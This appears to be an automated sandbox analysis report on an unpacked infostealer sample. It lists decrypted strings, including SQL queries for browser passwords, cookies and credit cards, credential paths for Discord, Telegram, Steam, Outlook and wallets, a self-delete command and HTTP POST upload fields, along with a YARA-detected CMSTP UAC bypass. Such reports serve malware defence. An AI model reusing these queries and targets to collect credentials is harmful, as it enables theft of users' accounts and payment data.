Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: RegEnumKeyExA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: RegOpenKeyExA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: RegCloseKey
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: RegEnumValueA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: CryptBinaryToStringA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: CryptUnprotectData
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: SHGetFolderPathA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: ShellExecuteExA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: InternetOpenUrlA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: InternetConnectA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: InternetCloseHandle
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: InternetOpenA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: HttpSendRequestA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: HttpOpenRequestA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: InternetReadFile
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: InternetCrackUrlA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: StrCmpCA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: StrStrA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: StrCmpCW
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: PathMatchSpecA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: GetModuleFileNameExA
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: RmStartSession
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: RmRegisterResources
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: RmGetList
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: RmEndSession
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: sqlite3_open
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: sqlite3_prepare_v2
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: sqlite3_step
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: sqlite3_column_text
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: sqlite3_finalize
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: sqlite3_close
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: sqlite3_column_bytes
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: sqlite3_column_blob
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: encrypted_key
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: PATH
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: NSS_Init
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: NSS_Shutdown
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: PK11_FreeSlot
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: PK11_Authenticate
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: PK11SDR_Decrypt
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: C:\ProgramData\
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: browser:
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: profile:
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: url:
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: login:
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: password:
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: Opera
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: OperaGX
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: Network
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: cookies
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: .txt
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: TRUE
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: FALSE
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: autofill
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: SELECT name, value FROM autofill
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: history
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: name:
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: month:
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: year:
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: card:
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: Cookies
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: Login Data
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: Web Data
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: History
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: logins.json
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: formSubmitURL
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: usernameField
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: encryptedUsername
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: encryptedPassword
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: guid
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: cookies.sqlite
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: formhistory.sqlite
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: places.sqlite
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: plugins
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: Local Extension Settings
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: Sync Extension Settings
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: IndexedDB
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: Opera Stable
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: Opera GX Stable
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: CURRENT
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: chrome-extension_
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: _0.indexeddb.leveldb
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: Local State
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: profiles.ini
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: chrome
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: opera
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: firefox
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: wallets
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: %08lX%04lX%lu
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: ProductName
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: ProcessorNameString
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: DisplayName
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: DisplayVersion
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: Network Info:
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: - IP: IP?
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: - Country: ISO?
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: System Summary:
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: - HWID:
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: - OS:
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: - Architecture:
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: - UserName:
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: - Computer Name:
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: - Local Time:
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: - UTC:
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: - Language:
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: - Keyboards:
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: - Laptop:
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: - Running Path:
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: - CPU:
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: - Threads:
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: - Cores:
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: - RAM:
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: - Display Resolution:
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: - GPU:
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: User Agents:
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: Installed Apps:
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: All Users:
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: Current User:
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: Process List:
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: system_info.txt
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: freebl3.dll
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: mozglue.dll
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: msvcp140.dll
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: nss3.dll
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: softokn3.dll
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: vcruntime140.dll
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: \Temp\
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: .exe
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: runas
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: open
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: /c start
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: %DESKTOP%
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: %APPDATA%
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: %LOCALAPPDATA%
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: %USERPROFILE%
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: %DOCUMENTS%
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: %PROGRAMFILES%
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: %PROGRAMFILES_86%
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: %RECENT%
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: *.lnk
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: files
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: \discord\
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: \Local Storage\leveldb
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: \Telegram Desktop\
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: key_datas
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: D877F783D5D3EF8C*
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: map*
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: A7FDF864FBC10B77*
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: F8806DD0C461824F*
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: Telegram
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: *.tox
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: *.ini
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: Password
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: 00000001
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: 00000002
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: 00000003
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: 00000004
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: \Outlook\accounts.txt
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: Pidgin
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: \.purple\
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: accounts.xml
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: dQw4w9WgXcQ
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: token:
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: Software\Valve\Steam
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: SteamPath
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: \config\
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: ssfn*
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: config.vdf
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: DialogConfig.vdf
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: libraryfolders.vdf
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: loginusers.vdf
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: \Steam\
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: sqlite3.dll
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: browsers
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: done
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: soft
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: \Discord\tokens.txt
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: https
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: POST
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: HTTP/1.1
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: hwid
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: build
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: token
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: file_name
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: file
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: message
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack	String decryptor: screenshot.jpg

Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree,	1_2_00409540
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_004155A0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	1_2_004155A0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	1_2_00406C10
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	1_2_004094A0
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	1_2_0040BF90
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6BB86C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	1_2_6BB86C80
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Code function: 1_2_6C8BA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	1_2_6C8BA9A0
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Code function: 2_2_001D4280 CreateFileW,GetLastError,GetFileSize,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,__allrem,ReadFile,CryptDecrypt,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	2_2_001D4280
Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe	Code function: 2_2_001D45A0 CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptDeriveKey,CryptDestroyHash,CryptReleaseContext,	2_2_001D45A0

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 2.2.run.exe.26ccd5b.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.run.exe.3e1e15b.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.cmd.exe.4b5c264.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.cmd.exe.580fe64.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.run.exe.26cc15b.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.cmd.exe.57cb976.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.run.exe.268886d.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.run.exe.3dda86d.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.cmd.exe.580f264.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.cmd.exe.4b5ce64.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.run.exe.3e1ed5b.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.cmd.exe.4b18976.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2163360816.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2506109737.0000000004B12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1865849409.0000000002681000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2262937646.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: run.exe PID: 2652, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 3488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: run.exe PID: 8096, type: MEMORYSTR

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\wxfSIz4PAi.exe	Unpacked PE file: 0.2.wxfSIz4PAi.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exe	Unpacked PE file: 1.2.u5ek.0.exe.400000.0.unpack

Source: wxfSIz4PAi.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\wxfSIz4PAi.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 195.181.163.193:443 -> 192.168.2.4:49752 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: u5ek.0.exe, 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2930988903.000002727CF20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: u5ek.0.exe, 00000001.00000002.2206659257.000000006C98F000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveHUD\obj\Debug\PerceiveHUD.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Cleanup\obj\Release\Cleanup.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2920960862.000002727C8E0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdbz9 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: c:\release\WorkingDir\PrismLibraryBuild\PrismLibrary\Desktop\Prism\obj\Release\Microsoft.Practices.Prism.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929436682.000002727CE70000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: run.exe, 00000002.00000002.1866972606.0000000003900000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000002.00000002.1867218514.0000000003DB7000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000002.00000002.1866008850.00000000027BD000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163183799.0000000005416000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163536288.00000000058F0000.00000004.00001000.00020000.00000000.sdmp, run.exe, 00000014.00000002.2292633080.000000000471F000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000014.00000002.2292037261.0000000004260000.00000004.00000800.00020000.00000000.sdmp
